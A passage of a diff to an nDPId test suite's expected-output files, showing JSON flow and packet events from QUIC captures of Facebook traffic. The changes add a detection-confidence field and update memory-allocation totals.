KjEAiVgPEzOZ8CufggYEMfnAHCuOwF04gvqplTrrZWKOSNpdQNeFrRsWk7y1RbIKw3b8jWOTzA\/3wnocU7LCIqLpjBDheYw+YKL\/QStNjvcf462QDT2fMTEzd2qFUE5\/HIdvgFCjr11QAYfzSa9caF4orrxStMFBMwLrngiPEoNK2oL1ixSvqcDH1eCryay+ufbCfgtp9mN21cP9bS1fp+KOtJdRjk+WwIrnLE7yFL2kPl4Y1ub8Ic+0DgBOwxUrYa0lSq611ixLqvgBVVHqkVlsmy5FzYlt4nKwAzaE+UMlVSse0y5ciP9QYj7PgUOQsYRJLOdnUB1nb1cLIVzISsr9mEOc4Z\/V5yQfx0Je4KZnrBbnTxqzPJmczioPnEqWI3SSJQvibzfqftopphp69YYIvmngwQ9boqS8nu\/0Z90F4tXrXlEqVlkyt8z345OCJheKM35O3g1+gtDgXes9IlOq0VZHWc1xWYAyu3e5lYps9GawHgztTKd5Dh6phItAr7WJdjC7E5+Hw0Djk+jR2QPNAEyXNvBFWYdDCSKqCL0EW4k8u46MkhLkYoD\/U5LiEaiB5YSuGX8HZDJEwdOPPEWcT2hknjUDiQIy7tuEeBHkZxly3y9r8TtSEnAlDGbBVFAT+DI1sU7ifZHKOelnaNbzJX29JqcLfJH6OdFC035GL8QU1vvk19qbGftY3DBf6EJAhrCyEG8T68nr4mpyNVonkDSzrMh1qFjIZcwFXjgWWM6+wxfrI7EB5HOgW0H2RU+8jBV8bTAp0cYUEIW83AlhSIGJhaN4hzo4QbiQ\/NEKSL4V6HA7r2y3QQu7WQiGeuhWzieHC\/re+NOqmY8UZ2Nbtc52d9K25gQKE7BXNhq2zsjuIhLJme7BBI75RlEqF\/camjLVcquotPgLUp7uXIyomz0zmkrCGiGxy4HlklTCcE1ashYaXZA\/9HX39Pj6qB+WKglzfibh+ldNWXcB79RaHBC3E7rGwoRJM5jkaMEkWLJVppPuZZUXD0CLZZ5SItvsTmJ1D5A5i3llXNLFE2q4czLsPbe5Ft7r2t0="}
-00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":24710,"flow_last_seen":24710,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":24710,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"31.13.86.8","src_port":35601,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"graph.facebook.com","version":"TLSv1.3","alpn":"h3-fb-05,h1q-fb","ja3":"a3795d067fbf6f44c8657f9e9cbae493","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft)"}}
+00821{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":24710,"flow_last_seen":24710,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":24710,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"31.13.86.8","src_port":35601,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"graph.facebook.com","version":"TLSv1.3","alpn":"h3-fb-05,h1q-fb","ja3":"a3795d067fbf6f44c8657f9e9cbae493","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft)"}}
 02122{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":24717,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":24717,"pkt":"CAAnANMtUlQAEjUCCABFAAUAAAYAAEAR9MMfDVYICgACDwG7ixEE7JMhzPrOsAEACEhjA85S+SrVAETSp3xd4I3jcnRue9L34hUuKLzlfpPUk0DMF1\/VFxThZTibHyGTQPaeM6iOotElwwAC1lRX5vIn9ya6YsAZzR1T20xEKAiW3eJkBYrfQ3apmceqTTBCX0bJxPnVeRIzBODDHWoJM4cXlDC\/p3lohjBDIh+3Pmk8tNap58UqGgjHnaigatc5CgFJHJWL+Kd1f9qcpuyZT1uB\/ns\/WT+PLudF\/jQ9707j1mFbnqiURY6nhTe97ZArhq7t1JVJAsO33k150ABBjgVdT\/6wgI8ik0OKmmJMbfb2L+7Ixq0YAACyySDSzQt+wcslS6ksj5zkeJG1dT9Y35jxFQSLUO32yxmbwQFG+b4QvZMRJyJvqfQ7oSMncZe7gs3wgTuaXe5geZfkx17MmRYXTYrf9pvAukh+MM4Q8hjt2gZyy+8MqEokO31Taq32iXjDeFgjn7q\/sQ6rvlxCVyZt8Ccaw1VxzzUAQNXg6QrtjGJsnqKEgZqyevLn4vgbCyEPYSqzUTMTMLMrTP+YLSeAUyD\/0KlFtPE0vwwFCXwILzsVlF8Hrkegr6zVR+h\/fNZFiUKr8jA4htexop3\/TtMjF2PSObMi\/B\/O4yOQK7dMjsb7j6HNoUatgqnfa\/Ep22MPaFjhmHCE5j8WrQYwGpwTuF1k+FX+IBnWV4aUFnYpvfr221AiaeRWseWythbDWPKdPOoQEd\/nzlYGC5Oxk\/91qMZSP6Qi8tEzsAHdyiB9WngqFXo1pqCT6\/T6hHvEqNor+wZ910MK6fQ\/Z\/7idL3\/nnBnU9m8lqNNZM0XegQQnU8+PD\/XZhQjxUwoqqNWAXTx+KKl5uQmMcpN8TieU3aBwrb2x1xcZVNXnjwFxiEsI7kDQg0bAdgGrjrWKUk4cVimEMb0EC3L3V2ZK9Ef+8sswkJ6ekYpwvMTIYU4ZOYeN6c9agkkoqzbCCHeRQql9R0YriJFUFgYENUK5b9nwRNBW+A+lZE8ptuzw5xsFcuyBXpjCKYIgsmKcLlQPkBkV4L5QGZQzzBmN2GgfUAEzN8WWVN0hJqYa9YhcX7zxmRv9gsMitNksaFnr6AlihFLFZqlT9Y648AprztjF7njBZZ3u+CXpZkG7Px2yrrdTouwjAToPn\/AdVmPPTHV6xKp99fDbwaMyfL+yOcnJ2plbK+wkS1jsiP\/yDk9VzA04xL0657ViUEAuv3t4Pev7pI\/DIFdRVSmTSWKvywkuBVJ\/VJOp\/6cO+Cy5FlDhTQR7H8evMXUaEHp69QHfF8fPUAjUyJ7IMeXXtuK3UkzI7UvsOqWVYGkA2OumbWmFRfgS9XBGi3DmR5otgit5Y81MAvHsCQ0V0IB2P\/yq9sRuL6R8TwF63sAvaPwfsPjICjHyZ2krnIlWXUbArKvncQeHm1H6y9ztqgfn+NTwpQWRfi71aj5FP2C+U3RB9l5HqGgyZJ9tt\/Xiom3MonkmdTNfE9C0G+zTKbgAzuir0+laGJim+TV37+wtcreN2P4GKPPo2goOCnc140xbDBLn4BL2axie9RcUyuxXK9wAWvijAfXal3f1DydwVZ8LxwK8o06yHcTKFQ\/sXJaHnxv2HTtF\/v0IBQjQRHILVxnhCjAh73MlFUFSG3zJQ2aU164W5cGJFQS3\/OOJsBbuI1J+KjSFQ=="}
 02119{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":24717,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":24717,"pkt":"CAAnANMtUlQAEjUCCABFAAUAAAgAAEAR9MEfDVYICgACDwG7ixEE7GUmy\/rOsAEACEhjA85S+SrVAETSuH7quCgS8Qh0D\/bDO3gFDyLADGIuWnyCygbJxoXjp96KXvspho+865YDAISOGlOK6zOTsHDQAebkiFhwjAE3CGShccg0NcaDyS5u33R8Osm0onTcQUcavm+SMZHNxND0mAg59a7z7rYhXIsBKLYSznCIFNmBhvnQ+54HWzq4kDWVLL0ptfvb3giThFXk1AIMtBbaQwMGxHg\/8x0s7Ppw1zOCvbNuFb2SaGK8woqt2broJB\/xJJE2S1FwZCmQqqrE1mHTwDi+8M\/OC1IyVNxKVB8saqcFSbFe3BJEULgEgbvBwmfmNN7Wau\/J6gJxg5w745\/ujGtOLBoEAnkzp3XoTJN0Y42xyNe7RF+e2AS8staHpKBMbgG4b2fukqv0W5QWMOb9XdlK5lappO8kEpmoLvACo9Sy1bI0dfdz52edGlrvLjFy2h3zOMrwDHWDRiYmPSAbJ9pyo+VCqFMWVDhQI4ZmsKudQZcU+vReqpUp36fwM5gOtsh2Hk\/S0k+EHqDAZZLNzSF4Yr5ZabIDN\/R6biJU+FbtoUG+RJBpWcvmHAUftMbmErNWLgTpRpllj3nUl2F8eMASJGjRK8oYFrTV1fl7xjdeBam93XysGVWS92VND4SDvDULI6TRr\/337rNSj3EREqThlcSaMocH0kz+\/upNhJQxDeelV1RY26qv9bW8VdFma6p7uhfRK2roH3G5uc\/+tiG6qdmRct7WQoGsbTeaFFwB7Ji7Wtb9Amekof3OVUrPd+6iV+W3mM4hQL9kRTkFzHEd\/WA\/+8ZmZ+0XzQrpy3WwRvRc4DmvV7nvOYs8y+909LdGLV6CpRLEK1604OVZbyXxVxq8+mD19ElUn1g8QnbzGBFa3Eif7B0cGdFF8WqgYvqe7ufF46ZJs8QD63+SQv8gGxmUo3SJWQ3Yfj1uYEYSEfqi43AQxOFbKmd5oqszRdikvUk0Zh8XMjntw3CR4tWh1lqTR3LIN8Lt7A9gIRX8+3G76YoaDY2JIMjxOuLYIRBVe\/VWBuKPMLqRCv4wvIDach8GKJmbI9PTQ01q1Z5kL\/zM7jTdFAlentpckr6+ua\/D6t6rLd0nkkL8d+15pg8\/FKhrDBHA4Ml4BRHizjz4SpRJ2QEiV\/niWkbX1e0hkpcbZ2xmOFDZW\/9O8RjAOdM08kiCSbKZTUpnl9P0qLKtjystpZa5q8OrBMgSHUgHM1S7geU06smT7+czbBGnnd5A+6PV0mPwqueT\/OUV15fL2NUOxgfqhC8iKqRfJcjzm8CssrkrLVEfaPmw7D7KOm7\/2J64iyqOubriFO6KrbjP+1qKiLmCaqNeEy3JTylMKWsH5UVovtnGGCKeolJjanKSFdzQ0naGenN7GlArcfV78Zclt+QC9mK2mtHkEiOwhoeprg\/zQujUyWH4lxZTrhtEFhlJUvQKpPst4HYEqZgxQPGS5nmr51v1f2cwzcaORxf3cXeVVh\/GKwiwMjI8VaKzhRxAoKZZ3g1TUl61dqF4liU6GnZkX+YBlPJ80vXLVfIDc4zwsjaBUxk1pJO\/LOLCp5buKJ87EbzIoejsqFXfFarTVLwKw\/2KUHEIwDL1x1rU0t6Q+Ap29yyER+brp4OyVHhD6T7u9LrfjXexdQfUgnSNX1Ib4LZ7OO\/KrQ=="}
-00641{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":490,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":489,"flow_first_seen":24710,"flow_last_seen":74922,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":267691,"flow_avg_l4_payload_len":547,"midstream":0,"ts_msec":139922,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"31.13.86.8","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":490,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":490,"flow_first_seen":24710,"flow_last_seen":139922,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":267723,"flow_avg_l4_payload_len":546,"midstream":0,"ts_msec":139922,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"31.13.86.8","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":490,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":489,"flow_first_seen":24710,"flow_last_seen":74922,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":267691,"flow_avg_l4_payload_len":547,"midstream":0,"ts_msec":139922,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"31.13.86.8","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":490,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":490,"flow_first_seen":24710,"flow_last_seen":139922,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":267723,"flow_avg_l4_payload_len":546,"midstream":0,"ts_msec":139922,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"31.13.86.8","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"}}
 00162{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":490,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","total-events-serialized":9}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 490/490
@@ -15,9 +15,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4614467 bytes
-~~ total memory freed........: 4614467 bytes
-~~ total allocations/frees...: 100055/100055
+~~ total memory allocated....: 4699420 bytes
+~~ total memory freed........: 4699420 bytes
+~~ total allocations/frees...: 101645/101645
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 167 chars
 ~~ json string max len.......: 2127 chars
diff --git a/test/results/quic-mvfst-22_decryption_error.pcap.out b/test/results/quic-mvfst-22_decryption_error.pcap.out
index 68d38ad72..120a67da5 100644
--- a/test/results/quic-mvfst-22_decryption_error.pcap.out
+++ b/test/results/quic-mvfst-22_decryption_error.pcap.out
@@ -714,9 +714,9 @@
 ~~ total active/idle flows...: 0/0
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4593629 bytes
-~~ total memory freed........: 4593629 bytes
-~~ total allocations/frees...: 99550/99550
+~~ total memory allocated....: 4678910 bytes
+~~ total memory freed........: 4678910 bytes
+~~ total allocations/frees...: 101140/101140
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 184 chars
 ~~ json string max len.......: 2056 chars
diff --git a/test/results/quic-mvfst-27.pcapng.out b/test/results/quic-mvfst-27.pcapng.out
index 5a3ff31c7..0c7dae7e6 100644
--- a/test/results/quic-mvfst-27.pcapng.out
+++ b/test/results/quic-mvfst-27.pcapng.out
@@ -1,10 +1,10 @@
 00447{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":41432,"flow_last_seen":41432,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":41432,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.171.250.15","src_port":35957,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02165{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":41432,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1326,"pkt_l4_len":1240,"ts_msec":41432,"pkt":"UlQAEjUCCAAnANMtCABFAATsAABAAEAR6jcKAAIPRav6D4x1AbsE2OWQzPrOsAIIrbuyBEpv1K8AAES+140kYx8r1I1jytRmSbOd1I6+euAu\/WCog0hZ7CK2vbiQaDsUNhduZ4TaOU+YwMwzr4tFRPY4WVcwFZYxf3JpeyRLGb56IxYnrJ+wVEN3bI7bVdKHF8LObpsuaNgGvwptfsH+rDACd3BONx\/QShlSNEGgtojOTAb3IBxaMPoBBrqk2vcqdCneK9x+zToW6kQDTdEd1IieGWgR+hdSwpMJLkz6epIDIJvr2+7hnKY8vsay1GJiKAlvxUurjQpspuMDfgvdh0iM6M1FrTv7rKzGyRXK46jvoMQof1iOAPHATgwqM4ZuYMuNvt\/y0p1tz148IXIa\/fLbIf\/jtx8RB3egC2zhGA2mbRbaurTTw48eZ\/8+UmFX\/pGgD39VTuQ0iy3fwQ4KqkHSAZwYDfMrqtGQuy3zdVoOJcB1EfGcQ\/j15ErCmDlRT7vkVVWnNzp5ac2qQ30IkEy79yMP2uQl+qcNCK7LBv3ES0ZAYMoMzeMHxcHojmxmY7m9pU8\/6TN1mmhBOL55YskIGgF5b9dubHYOHRFbIoVzLmlUMAC3n\/J8icXYhMzF+2LMmkFk5V6Ftpg6RFwazyDsV1VvAG0px\/ZReUsDZc2BpKOvPXUMcmmbi7J+4xk79GjDWU7qn9No\/9OgaUBSqlTMXjLKVw1AQS9DQbbP6Ljm2tjkBmxsNgiaX3ZHZdlEZ39g+pfa+C3d0\/Me91SnnyzofgyFHFf\/FZrz8kZlG+cPy3y6jToJU9oYVkDn4scTl9+EJRhVW2fiSh2BpNrkr1jxBS6nl0AbZVVuTjZo1emeItVe2pTwk9uLFdXZ\/CsWVBwjAwBQ8vxgzBGFWe9Cz3WpWkEzkAzQeOKzfLIFJb1PdMquNCwMajA4Jx\/Cl8vTf2306+VAoELddtYLnop0Ayp+TxS0Rn4I5pIhgtvtCnBaEOMmPLVrk2Tj6N4i6o4MT6NN2UsGMhl2jrLGVEchP8VeBBOrUPQTIvY+Xm1UQd6ud\/GSXz1lmW9JWN\/jvl2VrC\/dEdNNNDsuFT5DVQqiDS81yxHlMqpnUJtGOqdXBxl\/ipvbbIFVJMAxqaqhOIq9lLXVi0WRSrle2jY8C6byBzVmaXR9ob+Wj5JgOJ4dl6+zmTJfROyutrX06SLZW3iXBCGlGsJZa3VoAGsKr8R2PPaQW1IM5QBB1\/g3l2+\/8cMTpVbSj+AToLePRXNLpaht6\/i0lf5tmm5WeIZEw\/kp8XgE1IVG1OwCHdXi3LW8Ju6ZT6+NSDZYRl5iCIMOLeH+Uqa7zxr6BPSdijI5fZHwJ7CyzIIsLtNldUOOeWaUdszlpTm5UglrnEBk\/8+KIWEVomulKHSD78LbyMa2ZwRhHyUIoQUx3u628eG5WvmgiPmoWBpQq0SAcNJkibSZlfyukZBXk6ytoD7RL+6u7B+gDbgoIKW3EI2Vygx0786PDvzKNz\/jICcqh071958oOMWvZwK4wNNnPl+hmatacx8NLqlbU4\/qy23i+aLaPb\/wBxpmPXyakND4mOvFt3dmh\/yOVbINbAdZZ958R4K\/VXTGhgBSkxwXbKGKq+I\/xQwGAiri3PaDQBO6NYoKc0jqzc3rTGw44eUPJeiqQ8qEhbvrsfPi3A+VS5FRGlwZaAkkAdoB2gRkAwEAAAAAAAAAAAAAABYAAQACACEB2gAAAAAAAAAAAAAAAAAAAAANY6kd"}
-00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":41432,"flow_last_seen":41432,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":41432,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.171.250.15","src_port":35957,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"graph.facebook.com","version":"TLSv1.3","alpn":"h3-fb-05","ja3":"61d8a93ff379660087082a82411f19a2","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft)"}}
+00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":41432,"flow_last_seen":41432,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":41432,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.171.250.15","src_port":35957,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"graph.facebook.com","version":"TLSv1.3","alpn":"h3-fb-05","ja3":"61d8a93ff379660087082a82411f19a2","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft)"}}
 02191{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":41464,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1346,"pkt_l4_len":1260,"ts_msec":41464,"pkt":"CAAnANMtUlQAEjUCCABFAAUAAHoAAEARKapFq\/oPCgACDwG7jHUE7DGTx\/rOsAIACGUZSqSBwJ2mAETSQ4uzcebnNMDWiCLwgEqse1zwFbQeUwCYbirASYBY9Wqb\/AVucNo+1QzVbJaW9TpMoqvmNgwqhyeKJHn4nzURskXOXtyoQu1UCn4VWBURvJjr0Pri5khEPw4xAwDV7X2Rmmpwaw6btUsOaonrqKF\/SrLeyArFzwB+JFVws5mjdog13nZj3AyrnfXROIcoKcafi5iIMUPL8fCRhq9X7vo879HkMFFe\/UL0Z6KfMxRHk\/gm5EOke7DkOtpvDqjM8A17vn\/YA\/LmKAMC318G22YHyWoexSGb3BcRVBGh\/JnZslVfKZDHgCPKBJ6TZoECS2S1Lkq5nHD0FrjB28JkpPGddocsvTJ4gXR11CtFRogKRhcL6ToomCWSsXQm4N4h+xa8EUgP+Qp0EvdNEgFlkK7QzIbTOeUkbO0qojWV6pfET3Iov+\/apIMX2oqertd1yP5huAQbmPBJDrUV5aSXJ2n4942yy8nej3YOzA3244Ppj3KJ1FI9fYQWy94tzkcAq0MyyNAtAzVQrMQHV9+ftrN2eaUEuTAr5G712uv1AnCx12zkzS\/bPkH5HakesCqHiBdPHaH4mxGfceFuvWrXvk9k8noKiLgriTnvQwp\/saWNDkm8kvfm9PpqQm+XgxMCJ0tq2pG80BHbTgRQV8MdZ11XnvblfPEVlDFLqayo6KQYDuE9pUfQ+9AqEaxGVZRMSVRaIpJDPVqd0UHWM8ATc92GN71YPW\/frstXWA7sGYASVobLo1b3c8kYQSBM7dcU\/iqAkl+FksHEaC1aLZjGfaRKtnrpTDuyyUXcztv9cqa5wo9RQzervEK0UxM3gVjtBBX1mCaBfaZIZdXvbDZThkMu9RGphMLYrx9SqWAcKRkM9YhQ4qnUOJEDTD2qoX8miGa+JoKbQ6qKnL2RRJM\/0dLcmr8S6LVgNf3TuED+N3hbsZ9OBQ7xHjHnYpm\/+OxE3iCQ7O\/MjCEYbY876HUh2UXvGhRXGh19ilKbwQQLH+dz5uix38Q4qECRqV09vmTz3Swbe+BtJ26CqtxI2DYiDUkT56hG4GnrWss\/5mqds3b7uwxVTv8iRTcgWALX6YR8I8LcEwnW6P35r6yzQ8NmLvjaaqZkC\/6YKBBhBFJ4gpdUENYZBLszMz\/0jCicUWKWyfwMDGVvAlcFM7uVWLy8jO0qLX37EScSwg3DeIeQr72\/VcJHLle0Tm+dHFDyuGwxcML\/AaZe6mgicoiyETeB09Smyq9Y78I5wTornR4T1K0JN64JfYcnJe1\/YmYcW1VlHkcIRW6sSa0q5r9kPM+iCHOL7wY9T6OnVogbkFJzee5fZ+Oq9S8PvlK+4jsPkUzDv6d3+PRuP5JWYWDpXd8Qhym58OswJSKelR1rmXKN2C\/uxVLv3kgZxbiHXFdSArCkFj5BWP4WtRYPeuQ5VALz9l8XUPpyq\/09yKtHs\/TW2KvPCNoNxInVtL\/9V7UyFB2cFMukn2UUKBEJJUOWG0p+3sALv+tMcZpDx9cDnCtfccjlF6qNg6Io5OabNDbmM3UDOyuHva8jvqAsKtELxYaeOp5rbZaQ+wK7lDWDooe0BUvE8YL9NWtHK\/I2zrwe4HzXFx1p5ULH4KoSajttOnTnVRnoaPTH5vR+8nV092hE6ZD\/6m9zExloCSQB2gHaBGQDAQAAAAAAAAAAAAAAFgABAAIAIQHaAAAAAAAAAAAAAAAAAAAAACg8yWg="}
 02191{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":41464,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1346,"pkt_l4_len":1260,"ts_msec":41464,"pkt":"CAAnANMtUlQAEjUCCABFAAUAAHsAAEARKalFq\/oPCgACDwG7jHUE7Icwx\/rOsAIACGUZSqSBwJ2mAETStSk6pRwdyId1aH4WX4pVsk+hVtbLW4hKoqKIUKSo9tdUjjTVL5Yto7M3DICwaAoLYXCD+5dqw0TmZSrfqNiW2qJkNrsg0k\/kAdqV7j6+J9emg0iopVNY8z94Dkdknf05ci\/NoDXo7jX0aTp1J6GxxB8erH\/0SWZ+DyrbIMZ0xZ5SuS1DqMnN61NBKxN4\/jPv9ciPfLFFXyU0okn\/oJgJdQ4WrwMnOPK0yukS3dDQKMu5v+5h3OqBwQW1oLHmZA6rMWwlnpuiFU739YXcxuHETmzC2NOSBa0FZ1xSGByNv0mIS\/veQS6ztyCKi6cmIt52Goz5V26xn8ITbWRMKyzCQ9ygzGjFLSLB+V+ogEf08ganfO6W0dHJdPTEHqx274QToI6nzYBz8eQeCAoVd4nrh3slWslWTkHeQVW8sENY6mHlCHceqCHC8YwsKeoSN\/4JG6l1w4zyPArMZGkKB7jSxPuUQCGzOht7pw5Gk5Gp83Di44gZYUIyNVymDB16sT39aoraDeo5r5qBdNZ91SsMzaUcukPc+uOFPSAz0EuZbTe9n8OtdEkkzeGl9cG18rBcD7tfjxG18gi\/aTc\/Qsb2KdP82bZ\/OipJydJdUpM++DNflKBUq6VmZNq\/mEwBZaf36uML1LJOAoceV1rx2cgE7b5Wa2y583PSIvc0y8yCVCHd7UpFmIJOJrYMAiOgNdkL9i8G7a60vJ0BffKaiILbh52Cd\/gZSExquDEnfPS9pscJ3chfy\/\/FZGZ2CQbE65G5r2LgRj1a0KrZ\/O4ML+0k9MQaf9He5c\/jILvUKyvJwLUWG3lSoXOphrxABdatvx5PAii2lwtYhrYvxbQdkmGsIRtsvgWyth\/48R3yefn+bIHFq+Ln\/mQ4+8W6h+y9VYGjLy+j1gNFUujglm08r+aneixuCDo8NVE+WAW9F9bx6GkTQPaTP2\/obE0Ej5h95N8FRRXbNl8Q32+hc1BcPW7PYZhe4s7f99gVOs1PvusSkQjfl9x1h6vbtCoGsaxvv+KkMXJr040is81X8KUUNFqu8hZlZbEQdDUlK04iWVHyjfijDT4J15Tv7e9ZlWiE8P4TthJEkS\/V\/B6UFWx7NxNha5AI5q7ShAs7c3HMWi7ShahE0cUHWo1N0zwF8\/WnAGHEQUC8y4BhBQ7EaKwJ5nulzruzqp+D0MI00rZhOKTfBp6FWu0gmkwjBtMV14lN3KiO+Fugvl0PPD7usXWaKzR2dw4JslfP5IRxZB5PlrUhggAF+4XvJxhjR